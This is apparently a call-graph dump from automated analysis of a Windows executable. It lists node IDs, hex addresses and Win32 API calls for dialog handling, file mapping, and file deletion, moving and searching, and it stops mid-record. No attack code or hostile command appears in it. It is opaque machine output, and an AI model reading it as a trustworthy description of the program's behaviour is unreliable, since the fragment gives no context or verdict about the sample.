23600->23605 23604->23600 23606 42b630 _abort 23605->23606 23609 4310dc 23606->23609 23612 43109e GetCurrentProcess GetProcessAffinityMask 23609->23612 23613 42b597 23612->23613 23613->23593 25351 440ada 51 API calls 2 library calls 23720 43b7e0 23721 43b7ea __EH_prolog 23720->23721 23886 421316 23721->23886 23724 43bf0f 23958 43d69e 23724->23958 23726 43b841 23727 43b82a 23727->23726 23729 43b89b 23727->23729 23730 43b838 23727->23730 23733 43b92e GetDlgItemTextW 23729->23733 23739 43b8b1 23729->23739 23734 43b878 23730->23734 23735 43b83c 23730->23735 23731 43bf2a SendMessageW 23732 43bf38 23731->23732 23736 43bf52 GetDlgItem SendMessageW 23732->23736 23737 43bf41 SendDlgItemMessageW 23732->23737 23733->23734 23738 43b96b 23733->23738 23734->23726 23742 43b95f KiUserCallbackDispatcher 23734->23742 23735->23726 23740 42e617 53 API calls 23735->23740 23976 43a64d GetCurrentDirectoryW 23736->23976 23737->23736 23743 43b980 GetDlgItem 23738->23743 23744 43b974 23738->23744 23745 42e617 53 API calls 23739->23745 23746 43b85b 23740->23746 23742->23726 23748 43b9b7 SetFocus 23743->23748 23749 43b994 SendMessageW SendMessageW 23743->23749 23744->23734 23757 43be55 23744->23757 23750 43b8ce SetDlgItemTextW 23745->23750 23998 42124f SHGetMalloc 23746->23998 23747 43bf82 GetDlgItem 23752 43bfa5 SetWindowTextW 23747->23752 23753 43bf9f 23747->23753 23754 43b9c7 23748->23754 23766 43b9e0 23748->23766 23749->23748 23755 43b8d9 23750->23755 23977 43abab GetClassNameW 23752->23977 23753->23752 23756 42e617 53 API calls 23754->23756 23755->23726 23759 43b8e6 GetMessageW 23755->23759 23760 43b9d1 23756->23760 23761 42e617 53 API calls 23757->23761 23759->23726 23763 43b8fd IsDialogMessageW 23759->23763 23999 43d4d4 23760->23999 23767 43be65 SetDlgItemTextW 23761->23767 23763->23755 23769 43b90c TranslateMessage DispatchMessageW 23763->23769 23765 43c1fc SetDlgItemTextW 23765->23726 23772 42e617 53 API calls 23766->23772 23770 43be79 23767->23770 23769->23755 23775 42e617 53 API calls 23770->23775 23774 43ba17 23772->23774 23773 43bff0 23779 43c020 23773->23779 23782 42e617 53 API calls 23773->23782 23780 424092 _swprintf 51 API calls 23774->23780 23807 43be9c _wcslen 23775->23807 23776 43b9d9 23896 42a0b1 23776->23896 23777 43c73f 97 API calls 23777->23773 23787 43c73f 97 API calls 23779->23787 23844 43c0d8 23779->23844 23783 43ba29 23780->23783 23786 43c003 SetDlgItemTextW 23782->23786 23788 43d4d4 16 API calls 23783->23788 23784 43ba73 23902 43ac04 SetCurrentDirectoryW 23784->23902 23785 43ba68 GetLastError 23785->23784 23793 42e617 53 API calls 23786->23793 23795 43c03b 23787->23795 23788->23776 23789 43c18b 23790 43c194 EnableWindow 23789->23790 23791 43c19d 23789->23791 23790->23791 23796 43c1ba 23791->23796 24017 4212d3 GetDlgItem EnableWindow 23791->24017 23792 43beed 23799 42e617 53 API calls 23792->23799 23797 43c017 SetDlgItemTextW 23793->23797 23805 43c04d 23795->23805 23828 43c072 23795->23828 23802 43c1e1 23796->23802 23813 43c1d9 SendMessageW 23796->23813 23797->23779 23798 43ba87 23803 43ba9e 23798->23803 23804 43ba90 GetLastError 23798->23804 23799->23726 23800 43c0cb 23808 43c73f 97 API calls 23800->23808 23802->23726 23816 42e617 53 API calls 23802->23816 23809 43bb11 23803->23809 23814 43bb20 23803->23814 23815 43baae GetTickCount 23803->23815 23804->23803 24015 439ed5 32 API calls 23805->24015 23806 43c1b0 24018 4212d3 GetDlgItem EnableWindow 23806->24018 23807->23792 23817 42e617 53 API calls 23807->23817 23808->23844 23809->23814 23818 43bd56 23809->23818 23811 43c066 23811->23828 23813->23802 23823 43bcfb 23814->23823 23824 43bcf1 23814->23824 23825 43bb39 GetModuleFileNameW 23814->23825 23820 424092 _swprintf 51 API calls 23815->23820 23821 43b862 23816->23821 23822 43bed0 23817->23822 23918 4212f1 GetDlgItem ShowWindow 23818->23918 23830 43bac7 23820->23830 23821->23726 23821->23765 23831 424092 _swprintf 51 API calls 23822->23831 23827 42e617 53 API calls 23823->23827 23824->23734 23824->23823 24009 42f28c 82 API calls 23825->24009 23826 43c169 24016 439ed5 32 API calls 23826->24016 23835 43bd05 23827->23835 23828->23800 23836 43c73f 97 API calls 23828->23836 23829 43bd66 23919 4212f1 GetDlgItem ShowWindow 23829->23919 23903 42966e 23830->23903 23831->23792 23834 43c188 23834->23789 23841 424092 _swprintf 51 API calls 23835->23841 23842 43c0a0 23836->23842 23838 42e617 53 API calls 23838->23844 23839 43bb5f 23840 424092 _swprintf 51 API calls 23839->23840 23845 43bb81 CreateFileMappingW 23840->23845 23846 43bd23 23841->23846 23842->23800 23847 43c0a9 DialogBoxParamW 23842->23847 23843 43bd70 23848 42e617 53 API calls 23843->23848 23844->23789 23844->23826 23844->23838 23850 43bbe3 GetCommandLineW 23845->23850 23880 43bc60 __InternalCxxFrameHandler 23845->23880 23858 42e617 53 API calls 23846->23858 23847->23734 23847->23800 23851 43bd7a SetDlgItemTextW 23848->23851 23853 43bbf4 23850->23853 23920 4212f1 GetDlgItem ShowWindow 23851->23920 23852 43baed 23855 43baff 23852->23855 23856 43baf4 GetLastError 23852->23856 24010 43b425 SHGetMalloc 23853->24010 23911 42959a 23855->23911 23856->23855 23862 43bd3d 23858->23862 23859 43bd8c SetDlgItemTextW GetDlgItem 23863 43bdc1 23859->23863 23864 43bda9 GetWindowLongW SetWindowLongW 23859->23864 23861 43bc10 24011 43b425 SHGetMalloc 23861->24011 23921 43c73f 23863->23921 23864->23863 23867 43bc1c 24012 43b425 SHGetMalloc 23867->24012 23870 43c73f 97 API calls 23872 43bddd 23870->23872 23871 43bc28 24013 42f3fa 82 API calls 2 library calls 23871->24013 23946 43da52 23872->23946 23874 43bccb 23874->23824 23878 43bce1 UnmapViewOfFile CloseHandle 23874->23878 23876 43bc3f MapViewOfFile 23876->23880 23878->23824 23879 43c73f 97 API calls 23884 43be03 23879->23884 23880->23874 23882 43bcb7 Sleep 23880->23882 23881 43be2c 24014 4212d3 GetDlgItem EnableWindow 23881->24014 23882->23874 23882->23880 23884->23881 23885 43c73f 97 API calls 23884->23885 23885->23881 23887 421378 23886->23887 23888 42131f 23886->23888 24020 42e2c1 GetWindowLongW SetWindowLongW 23887->24020 23889 421385 23888->23889 24019 42e2e8 62 API calls 2 library calls 23888->24019 23889->23724 23889->23726 23889->23727 23892 421341 23892->23889 23893 421354 GetDlgItem 23892->23893 23893->23889 23894 421364 23893->23894 23894->23889 23895 42136a SetWindowTextW 23894->23895 23895->23889 23897 42a0bb 23896->23897 23898 42a175 23897->23898 23899 42a14c 23897->23899 24021 42a2b2 23897->24021 23898->23784 23898->23785 23899->23898 23900 42a2b2 8 API calls 23899->23900 23900->23898 23902->23798 23904 429678 23903->23904 23905 4296d5 CreateFileW 23904->23905 23906 4296c9 23904->23906 23905->23906 23907 42971f 23906->23907 23908 42bb03 GetCurrentDirectoryW 23906->23908 23907->23852 23909 429704 23908->23909 23909->23907 23910 429708 CreateFileW 23909->23910 23910->23907 23912 4295cf 23911->23912 23913 4295be 23911->23913 23912->23809 23913->23912 23914 4295d1 23913->23914 23915 4295ca 23913->23915 24047 429620 23914->24047 24042 42974e 23915->24042 23918->23829 23919->23843 23920->23859 23922 43c749 __EH_prolog 23921->23922 23923 43bdcf 23922->23923 23924 43b314 ExpandEnvironmentStringsW 23922->23924 23923->23870 23935 43c780 _wcslen _wcsrchr 23924->23935 23926 43b314 ExpandEnvironmentStringsW 23926->23935 23927 43ca67 SetWindowTextW 23927->23935 23930 443e3e 22 API calls 23930->23935 23932 43c855 SetFileAttributesW 23933 43c90f GetFileAttributesW 23932->23933 23945 43c86f _abort _wcslen 23932->23945 23933->23935 23937 43c921 DeleteFileW 23933->23937 23935->23923 23935->23926 23935->23927 23935->23930 23935->23932 23938 43cc31 GetDlgItem SetWindowTextW SendMessageW 23935->23938 23941 43cc71 SendMessageW 23935->23941 24062 431fbb CompareStringW 23935->24062 24063 43a64d GetCurrentDirectoryW 23935->24063 24065 42a5d1 6 API calls 23935->24065 24066 42a55a FindClose 23935->24066 24067 43b48e 76 API calls 2 library calls 23935->24067 23937->23935 23939 43c932 23937->23939 23938->23935 23940 424092 _swprintf 51 API calls 23939->23940 23942 43c952 GetFileAttributesW 23940->23942 23941->23935 23942->23939 23943 43c967 MoveFileW 23942->23943 23943->23935 23944 43c97f MoveFileExW 23943->23944 23944->23935 23945->23933 23945->23935 24064 42b991 51 API calls 3 library calls 23945->24064 23947 43da5c __EH_prolog 23946->23947 24068 430659 23947->24068 23949 43da8d 24072 425b3d 23949->24072 23951 43daab 24076 427b0d 23951->24076 23955 43dafe 24092 427b9e 23955->24092 23957 43bdee 23957->23879 23959 43d6a8 23958->23959 24580 43a5c6 23959->24580 23962 43bf15 23962->23731 23962->23732 23963 43d6b5 GetWindow 23963->23962 23968 43d6d5 23963->23968 23964 43d6e2 GetClassNameW 24585 431fbb CompareStringW 23964->24585 23966 43d706 GetWindowLongW 23967 43d76a GetWindow 23966->23967 23969 43d716 SendMessageW 23966->23969 23967->23962 23967->23968 23968->23962 23968->23964 23968->23966 23968->23967 23969->23967 23970 43d72c GetObjectW 23969->23970 24586 43a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23970->24586 23972 43d743 24587 43a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23972->24587 24588 43a80c 8 API calls 23972->24588 23975 43d754 SendMessageW DeleteObject 23975->23967 23976->23747 23978 43abf1 23977->23978 23979 43abcc 23977->23979 23981 43abf6 SHAutoComplete 23978->23981 23982 43abff 23978->23982 24591 431fbb CompareStringW 23979->24591 23981->23982 23985 43b093 23982->23985 23983 43abdf 23983->23978 23984 43abe3 FindWindowExW 23983->23984 23984->23978 23986 43b09d __EH_prolog 23985->23986 23987 4213dc 84 API calls 23986->23987 23988 43b0bf 23987->23988 24592 421fdc 23988->24592 23991 43b0eb 23994 4219af 128 API calls 23991->23994 23992 43b0d9 23993 421692 86 API calls 23992->23993 23995 43b0e4 23993->23995 23997 43b10d __InternalCxxFrameHandler ___std_exception_copy 23994->23997 23995->23773 23995->23777 23996 421692 86 API calls 23996->23995 23997->23996 23998->23821 24000 43b568 5 API calls 23999->24000 24001 43d4e0 GetDlgItem 24000->24001 24002 43d502 24001->24002 24003 43d536 SendMessageW SendMessageW 24001->24003 24006 43d50d ShowWindow SendMessageW SendMessageW 24002->24006 24004 43d572 24003->24004 24005 43d591 SendMessageW SendMessageW SendMessageW 24003->24005 24004->24005 24007 43d5e7 SendMessageW 24005->24007 24008 43d5c4 SendMessageW 24005->24008 24006->24003 24007->23776 24008->24007 24009->23839 24010->23861 24011->23867 24012->23871 24013->23876 24014->23744 24015->23811 24016->23834 24017->23806 24018->23796 24019->23892 24020->23889 24022 42a2bf 24021->24022 24023 42a2e3 24022->24023 24024 42a2d6 CreateDirectoryW 24022->24024 24025 42a231 3 API calls 24023->24025 24024->24023 24029 42a316 24024->24029 24026 42a2e9 24025->24026 24027 42a329 GetLastError 24026->24027 24030 42bb03 GetCurrentDirectoryW 24026->24030 24028 42a325 24027->24028 24028->23897 24029->24028 24034 42a4ed 24029->24034 24032 42a2ff 24030->24032 24032->24027 24033 42a303 CreateDirectoryW 24032->24033 24033->24027 24033->24029 24035 43ec50 24034->24035 24036 42a4fa SetFileAttributesW 24035->24036 24037 42a510 24036->24037 24038 42a53d 24036->24038 24039 42bb03 GetCurrentDirectoryW 24037->24039 24038->24028 24040 42a524 24039->24040 24040->24038 24041 42a528 SetFileAttributesW 24040->24041 24041->24038 24043 429781 24042->24043 24044 429757 24042->24044 24043->23912 24044->24043 24053 42a1e0 24044->24053 24048 42964a 24047->24048 24050 42962c 24047->24050 24049 429669 24048->24049 24061 426bd5 76 API calls 24048->24061 24049->23912 24050->24048 24051 429638 CloseHandle 24050->24051 24051->24048 24054 43ec50 24053->24054 24055 42a1ed DeleteFileW 24054->24055 24056 42a200 24055->24056 24057 42977f 24055->24057 24058 42bb03 GetCurrentDirectoryW 24056->24058 24057->23912 24059 42a214 24058->24059 24059->24057 24060 42a218 DeleteFileW 24059->24060 24060->24057 24061->24049 24062->23935 24063->23935 24064->23945 24065->23935 24066->23935 24067->23935 24069 430666 _wcslen 24068->24069 24096 4217e9 24069->24096 24071 43067e 24071->23949 24073 430659 _wcslen 24072->24073 24074 4217e9 78 API calls 24073->24074 24075 43067e 24074->24075 24075->23951 24077 427b17 __EH_prolog 24076->24077 24113 42ce40 24077->24113 24079 427b32 24119 43eb38 24079->24119 24081 427b5c 24128 434a76 24081->24128 24084 427c7d 24085 427c87 24084->24085 24087 427cf1 24085->24087 24160 42a56d 24085->24160 24089 427d50 24087->24089 24138 428284 24087->24138 24088 427d92 24088->23955 24089->24088 24166 42138b 74 API calls 24089->24166 24093 427bac 24092->24093 24095 427bb3 24092->24095 24094 432297 86 API calls 24093->24094 24094->24095 24097 4217ff 24096->24097 24108 42185a __InternalCxxFrameHandler 24096->24108 24098 421828 24097->24098 24109 426c36 76 API calls __vswprintf_c_l 24097->24109 24100 421887 24098->24100 24105 421847 ___std_exception_copy 24098->24105 24102 443e3e 22 API calls 24100->24102 24101 42181e 24110 426ca7 75 API calls 24101->24110 24104 42188e 24102->24104 24104->24108 24112 426ca7 75 API calls 24104->24112 24105->24108 24111 426ca7 75 API calls 24105->24111 24108->24071 24109->24101 24110->24098 24111->24108 24112->24108 24114 42ce4a __EH_prolog 24113->24114 24115 43eb38 8 API calls 24114->24115 24116 42ce8d 24115->24116 24117 43eb38 8 API calls 24116->24117 24118 42ceb1 24117->24118 24118->24079 24120 43eb3d ___std_exception_copy 24119->24120 24121 43eb57 24120->24121 24124 43eb59 24120->24124 24134 447a5e 7 API calls 2 library calls 24120->24134 24121->24081 24123 43f5c9 24136 44238d RaiseException 24123->24136 24124->24123 24135 44238d RaiseException 24124->24135 24127 43f5e6 24129 434a80 __EH_prolog 24128->24129 24130 43eb38 8 API calls 24129->24130 24131 434a9c 24130->24131 24132 427b8b 24131->24132 24137 430e46 80 API calls 24131->24137 24132->24084 24134->24120 24135->24123 24136->24127 24137->24132 24139 42828e __EH_prolog 24138->24139 24167 4213dc 24139->24167 24141 4282aa 24142 4282bb 24141->24142 24310 429f42 24141->24310 24145 4282f2 24142->24145 24175 421a04 24142->24175 24306 421692 24145->24306 24148 428389 24194 428430 24148->24194 24151 4283e8 24202 421f6d 24151->24202 24153 4282ee 24153->24145 24153->24148 24158 42a56d 7 API calls 24153->24158 24314 42c0c5 CompareStringW _wcslen 24153->24314 24156 4283f3 24156->24145 24206 423b2d 24156->24206 24218 42848e 24156->24218 24158->24153 24161 42a582 24160->24161 24165 42a5b0 24161->24165 24569 42a69b 24161->24569 24163 42a592 24164 42a597 FindClose 24163->24164 24163->24165 24164->24165 24165->24085 24166->24088 24168 4213e1 __EH_prolog 24167->24168 24169 42ce40 8 API calls 24168->24169 24170 421419 24169->24170 24171 43eb38 8 API calls 24170->24171 24174 421474 _abort 24170->24174 24172 421461 24171->24172 24173 42b505 84 API calls 24172->24173 24172->24174 24173->24174 24174->24141 24176 421a0e __EH_prolog 24175->24176 24185 421a61 24176->24185 24189 421b9b 24176->24189 24315 4213ba 24176->24315 24178 421bc7 24327 42138b 74 API calls 24178->24327 24181 423b2d 101 API calls 24186 421c12 24181->24186 24182 421bd4 24182->24181 24182->24189 24183 421c5a 24187 421c8d 24183->24187 24183->24189 24328 42138b 74 API calls 24183->24328 24185->24178 24185->24182 24185->24189 24186->24183 24188 423b2d 101 API calls 24186->24188 24187->24189 24193 429e80 79 API calls 24187->24193 24188->24186 24189->24153 24190 421cde 24190->24189 24191 423b2d 101 API calls 24190->24191 24191->24190 24193->24190 24348 42cf3d 24194->24348 24196 428440 24352 4313d2 GetSystemTime SystemTimeToFileTime 24196->24352 24198 4283a3 24198->24151 24199 431b66 24198->24199 24357 43de6b 24199->24357 24203 421f72 __EH_prolog 24202->24203 24205 421fa6 24203->24205 24365 4219af 24203->24365 24205->24156 24207 423b39 24206->24207 24208 423b3d 24206->24208 24207->24156 24217 429e80 79 API calls 24208->24217 24209 423b4f 24210 423b6a 24209->24210 24211 423b78 24209->24211 24212 423baa 24210->24212 24495 4232f7 89 API calls 2 library calls 24210->24495 24496 42286b 101 API calls 3 library calls 24211->24496 24212->24156 24215 423b76 24215->24212 24497 4220d7 74 API calls 24215->24497 24217->24209 24219 428498 __EH_prolog 24218->24219 24222 4284d5 24219->24222 24229 428513 24219->24229 24522 438c8d 103 API calls 24219->24522 24221 4284f5 24223 4284fa 24221->24223 24224 42851c 24221->24224 24222->24221 24227 42857a 24222->24227 24222->24229 24223->24229 24523 427a0d 152 API calls 24223->24523 24224->24229 24524 438c8d 103 API calls 24224->24524 24227->24229 24498 425d1a 24227->24498 24229->24156 24230 428605 24230->24229 24504 428167 24230->24504 24233 428797 24234 42a56d 7 API calls 24233->24234 24235 428802 24233->24235 24234->24235 24510 427c0d 24235->24510 24237 42d051 82 API calls 24243 42885d 24237->24243 24238 42898b 24527 422021 74 API calls 24238->24527 24239 428a5f 24244 428ab6 24239->24244 24257 428a6a 24239->24257 24240 428992 24240->24239 24246 4289e1 24240->24246 24243->24229 24243->24237 24243->24238 24243->24240 24525 428117 84 API calls 24243->24525 24526 422021 74 API calls 24243->24526 24249 428a4c 24244->24249 24530 427fc0 97 API calls 24244->24530 24245 428ab4 24250 42959a 80 API calls 24245->24250 24247 428b14 24246->24247 24246->24249 24251 42a231 3 API calls 24246->24251 24265 428b82 24247->24265 24295 429105 24247->24295 24531 4298bc 24247->24531 24248 42959a 80 API calls 24248->24229 24249->24245 24249->24247 24250->24229 24253 428a19 24251->24253 24253->24249 24528 4292a3 97 API calls 24253->24528 24254 42ab1a 8 API calls 24258 428bd1 24254->24258 24257->24245 24529 427db2 101 API calls 24257->24529 24260 42ab1a 8 API calls 24258->24260 24277 428be7 24260->24277 24263 428b70 24535 426e98 77 API calls 24263->24535 24265->24254 24266 428cbc 24267 428e40 24266->24267 24268 428d18 24266->24268 24270 428e52 24267->24270 24271 428e66 24267->24271 24291 428d49 24267->24291 24269 428d8a 24268->24269 24272 428d28 24268->24272 24278 428167 19 API calls 24269->24278 24273 429215 123 API calls 24270->24273 24274 433377 75 API calls 24271->24274 24275 428d6e 24272->24275 24279 428d37 24272->24279 24273->24291 24276 428e7f 24274->24276 24275->24291 24538 4277b8 111 API calls 24275->24538 24541 433020 123 API calls 24276->24541 24277->24266 24284 42981a 79 API calls 24277->24284 24286 428c93 24277->24286 24285 428dbd 24278->24285 24537 422021 74 API calls 24279->24537 24284->24286 24287 428de6 24285->24287 24288 428df5 24285->24288 24285->24291 24286->24266 24536 429a3c 82 API calls 24286->24536 24539 427542 85 API calls 24287->24539 24540 429155 93 API calls __EH_prolog 24288->24540 24294 428f85 24291->24294 24542 422021 74 API calls 24291->24542 24293 429090 24293->24295 24297 42a4ed 3 API calls 24293->24297 24294->24293 24294->24295 24296 42903e 24294->24296 24516 429f09 SetEndOfFile 24294->24516 24295->24248 24517 429da2 24296->24517 24299 4290eb 24297->24299 24299->24295 24543 422021 74 API calls 24299->24543 24301 429085 24302 429620 77 API calls 24301->24302 24302->24293 24304 4290fb 24544 426dcb 76 API calls _wcschr 24304->24544 24307 4216a4 24306->24307 24560 42cee1 24307->24560 24311 429f59 24310->24311 24312 429f63 24311->24312 24568 426d0c 78 API calls 24311->24568 24312->24142 24314->24153 24329 421732 24315->24329 24317 4213d6 24318 429e80 24317->24318 24319 429e92 24318->24319 24320 429ea5 24318->24320 24321 429eb0 24319->24321 24346 426d5b 77 API calls 24319->24346 24320->24321 24323 429eb8 SetFilePointer 24320->24323 24321->24185 24323->24321 24324 429ed4 GetLastError 24323->24324 24324->24321 24325 429ede 24324->24325 24325->24321 24347 426d5b 77 API calls 24325->24347 24327->24189 24328->24187 24330 421748 24329->24330 24341 4217a0 __InternalCxxFrameHandler 24329->24341 24331 421771 24330->24331 24342 426c36 76 API calls __vswprintf_c_l 24330->24342 24332 4217c7 24331->24332 24338 42178d ___std_exception_copy 24331->24338 24335 443e3e 22 API calls 24332->24335 24334 421767 24343 426ca7 75 API calls 24334->24343 24337 4217ce 24335->24337 24337->24341 24345 426ca7 75 API calls 24337->24345 24338->24341 24344 426ca7 75 API calls 24338->24344 24341->24317 24342->24334 24343->24331 24344->24341 24345->24341 24346->24320 24347->24321 24349 42cf54 24348->24349 24350 42cf4d 24348->24350 24349->24196 24353 42981a 24350->24353 24352->24198 24354 429833 24353->24354 24356 429e80 79 API calls 24354->24356 24355 429865 24355->24349 24356->24355 24358 43de78 24357->24358 24359 42e617 53 API calls 24358->24359 24360 43de9b 24359->24360 24361 424092 _swprintf 51 API calls 24360->24361 24362 43dead 24361->24362 24363 43d4d4 16 API calls 24362->24363 24364 431b7c 24363->24364 24364->24151 24366 4219bf 24365->24366 24368 4219bb 24365->24368 24369 4218f6 24366->24369 24368->24205 24370 421908 24369->24370 24371 421945 24369->24371 24372 423b2d 101 API calls 24370->24372 24377 423fa3 24371->24377 24375 421928 24372->24375 24375->24368 24381 423fac 24377->24381 24378 423b2d 101 API calls 24378->24381 24379 421966 24379->24375 24382 421e50 24379->24382 24381->24378 24381->24379 24394 430e08 24381->24394 24383 421e5a __EH_prolog 24382->24383 24402 423bba 24383->24402 24385 421e84 24386 421732 78 API calls 24385->24386 24388 421f0b 24385->24388 24387 421e9b 24386->24387 24430 4218a9 78 API calls 24387->24430 24388->24375 24390 421eb3 24392 421ebf _wcslen 24390->24392 24431 431b84 MultiByteToWideChar 24390->24431 24432 4218a9 78 API calls 24392->24432 24395 430e0f 24394->24395 24396 430e2a 24395->24396 24400 426c31 RaiseException CallUnexpected 24395->24400 24398 430e3b SetThreadExecutionState 24396->24398 24401 426c31 RaiseException CallUnexpected 24396->24401 24398->24381 24400->24396 24401->24398 24403 423bc4 __EH_prolog 24402->24403 24404 423bf6 24403->24404 24405 423bda 24403->24405 24407 423e51 24404->24407 24410 423c22 24404->24410 24458 42138b 74 API calls 24405->24458 24475 42138b 74 API calls 24407->24475 24409 423be5 24409->24385 24410->24409 24433 433377 24410->24433 24412 423ca3 24413 423d2e 24412->24413 24429 423c9a 24412->24429 24461 42d051 24412->24461 24443 42ab1a 24413->24443 24414 423c9f 24414->24412 24460 4220bd 78 API calls 24414->24460 24416 423c71 24416->24412 24416->24414 24417 423c8f 24416->24417 24459 42138b 74 API calls 24417->24459 24419 423d41 24423 423dd7 24419->24423 24424 423dc7 24419->24424 24467 433020 123 API calls 24423->24467 24447 429215 24424->24447 24427 423dd5 24427->24429 24468 422021 74 API calls 24427->24468 24469 432297 24429->24469 24430->24390 24431->24392 24432->24388 24434 43338c 24433->24434 24436 433396 ___std_exception_copy 24433->24436 24476 426ca7 75 API calls 24434->24476 24437 4334c6 24436->24437 24438 43341c 24436->24438 24442 433440 _abort 24436->24442 24478 44238d RaiseException 24437->24478 24477 4332aa 75 API calls 3 library calls 24438->24477 24441 4334f2 24442->24416 24444 42ab28 24443->24444 24446 42ab32 24443->24446 24445 43eb38 8 API calls 24444->24445 24445->24446 24446->24419 24448 42921f __EH_prolog 24447->24448 24479 427c64 24448->24479 24451 4213ba 78 API calls 24452 429231 24451->24452 24482 42d114 24452->24482 24454 42928a 24454->24427 24456 42d114 118 API calls 24457 429243 24456->24457 24457->24454 24457->24456 24491 42d300 97 API calls __InternalCxxFrameHandler 24457->24491 24458->24409 24459->24429 24460->24412 24462 42d072 24461->24462 24463 42d084 24461->24463 24492 42603a 82 API calls 24462->24492 24493 42603a 82 API calls 24463->24493 24466 42d07c 24466->24413 24467->24427 24468->24429 24470 4322a1 24469->24470 24471 4322ba 24470->24471 24474 4322ce 24470->24474 24494 430eed 86 API calls 24471->24494 24473 4322c1 24473->24474 24475->24409 24476->24436 24477->24442 24478->24441 24480 42b146 GetVersionExW 24479->24480 24481 427c69 24480->24481 24481->24451 24488 42d12a __InternalCxxFrameHandler 24482->24488 24483 42d29a 24484 42d2ce 24483->24484 24485 42d0cb 6 API calls 24483->24485 24486 430e08 SetThreadExecutionState RaiseException 24484->24486 24485->24484 24489 42d291 24486->24489 24487 438c8d 103 API calls 24487->24488 24488->24483 24488->24487 24488->24489 24490 42ac05 91 API calls 24488->24490 24489->24457 24490->24488 24491->24457 24492->24466 24493->24466 24494->24473 24495->24215 24496->24215 24497->24212 24499 425d2a 24498->24499 24545 425c4b 24499->24545 24502 425d5d 24503 425d95 24502->24503 24550 42b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24502->24550 24503->24230 24505 428186 24504->24505 24506 428232 24505->24506 24557 42be5e 19 API calls __InternalCxxFrameHandler 24505->24557 24556 431fac CharUpperW 24506->24556 24509 42823b 24509->24233 24511 427c22 24510->24511 24512 427c5a 24511->24512 24558 426e7a 74 API calls 24511->24558 24512->24243 24514 427c52 24559 42138b 74 API calls 24514->24559 24516->24296 24518 429db3 24517->24518 24521 429dc2 24517->24521 24519 429db9 FlushFileBuffers 24518->24519 24518->24521 24519->24521 24520 429e3f SetFileTime 24520->24301 24521->24520 24522->24222 24523->24229 24524->24229 24525->24243 24526->24243 24527->24240 24528->24249 24529->24245 24530->24249 24532 428b5a 24531->24532 24533 4298c5 GetFileType 24531->24533 24532->24265 24534 422021 74 API calls 24532->24534 24533->24532 24534->24263 24535->24265 24536->24266 24537->24291 24538->24291 24539->24291 24540->24291 24541->24291 24542->24294 24543->24304 24544->24295 24551 425b48 24545->24551 24547 425c6c 24547->24502 24549 425b48 2 API calls 24549->24547 24550->24502 24554 425b52 24551->24554 24552 425c3a 24552->24547 24552->24549 24554->24552 24555 42b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24554->24555 24555->24554 24556->24509 24557->24506 24558->24514 24559->24512 24561 42cef2 24560->24561 24566 42a99e 86 API calls 24561->24566 24563 42cf24 24567 42a99e 86 API calls 24563->24567 24565 42cf2f 24566->24563 24567->24565 24568->24312 24570 42a6a8 24569->24570 24571 42a6c1 FindFirstFileW 24570->24571 24572 42a727 FindNextFileW 24570->24572 24573 42a709 24571->24573 24574 42a6d0 24571->24574 24572->24573 24575 42a732 GetLastError 24572->24575 24573->24163 24576 42bb03 GetCurrentDirectoryW 24574->24576 24575->24573 24577 42a6e0 24576->24577 24578 42a6e4 FindFirstFileW 24577->24578 24579 42a6fe GetLastError 24577->24579 24578->24573 24578->24579 24579->24573 24589 43a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24580->24589 24582 43a5cd 24584 43a5d9 24582->24584 24590 43a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24582->24590 24584->23962 24584->23963 24585->23968 24586->23972 24587->23972 24588->23975 24589->24582 24590->24584 24591->23983 24593 429f42 78 API calls 24592->24593 24594 421fe8 24593->24594 24595 421a04 101 API calls 24594->24595 24598 422005 24594->24598 24596 421ff5 24595->24596 24596->24598 24599 42138b 74 API calls 24596->24599 24598->23991 24598->23992 24599->24598 24600 4213e1 84 API calls 2 library calls 25300 4394e0 GetClientRect 25329 4321e0 26 API calls std::bad_exception::bad_exception 25352 43f2e0 46 API calls __RTC_Initialize 24601 43eae7 24602 43eaf1 24601->24602 24603 43e85d ___delayLoadHelper2@8 14 API calls 24602->24603 24604 43eafe 24603->24604 25301 43f4e7 29 API calls _abort 25353 44bee0 GetCommandLineA GetCommandLineW 25330 42f1e8 FreeLibrary 25331 4295f0 80 API calls 25332 43fd4f 9 API calls 2 library calls 25354 425ef0 82 API calls 24613 4498f0 24621 44adaf 24613->24621 24616 449904 24618 44990c 24619 449919 24618->24619 24629 449920 11 API calls 24618->24629 24630 44ac98 24621->24630 24624 44adee TlsAlloc 24625 44addf 24624->24625 24626 43fbbc CatchGuardHandler 5 API calls 24625->24626 24627 4498fa 24626->24627 24627->24616 24628 449869 20 API calls 2 library calls 24627->24628 24628->24618 24629->24616 24631 44acc4 24630->24631 24632 44acc8 24630->24632 24631->24632 24635 44ace8 24631->24635 24637 44ad34 24631->24637 24632->24624 24632->24625 24634 44acf4 GetProcAddress 24636 44ad04 _unexpected 24634->24636 24635->24632 24635->24634 24636->24632 24638 44ad55 LoadLibraryExW 24637->24638 24643 44ad4a 24637->24643 24639 44ad72 GetLastError 24638->24639 24640 44ad8a 24638->24640 24639->24640 24641 44ad7d LoadLibraryExW 24639->24641 24642 44ada1 FreeLibrary 24640->24642 24640->24643 24641->24640 24642->24643 24643->24631 24644 44abf0 24646 44abfb 24644->24646 24647 44ac24 24646->24647 24648 44ac20 24646->24648 24650 44af0a 24646->24650 24657 44ac50 DeleteCriticalSection 24647->24657 24651 44ac98 _unexpected 5 API calls 24650->24651 24652 44af31 24651->24652 24653 44af4f InitializeCriticalSectionAndSpinCount 24652->24653 24656 44af3a 24652->24656 24653->24656 24654 43fbbc CatchGuardHandler 5 API calls 24655 44af66 24654->24655 24655->24646 24656->24654 24657->24648 25302 4488f0 7 API calls ___scrt_uninitialize_crt 25304 442cfb 38 API calls 4 library calls 25334 439580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25355 43c793 102 API calls 5 library calls 25306 43c793 97 API calls 4 library calls 25336 43b18d 78 API calls 25308 44b49d 6 API calls CatchGuardHandler 25309 43dca1 DialogBoxParamW 25376 43f3a0 27 API calls 25312 44a4a0 71 API calls _free 25337 43eda7 48 API calls _unexpected 25356 44a6a0 31 API calls 2 library calls 25313 4508a0 IsProcessorFeaturePresent 25377 426faa 111 API calls 3 library calls 24703 43f3b2 24704 43f3be ___scrt_is_nonwritable_in_current_image 24703->24704 24735 43eed7 24704->24735 24706 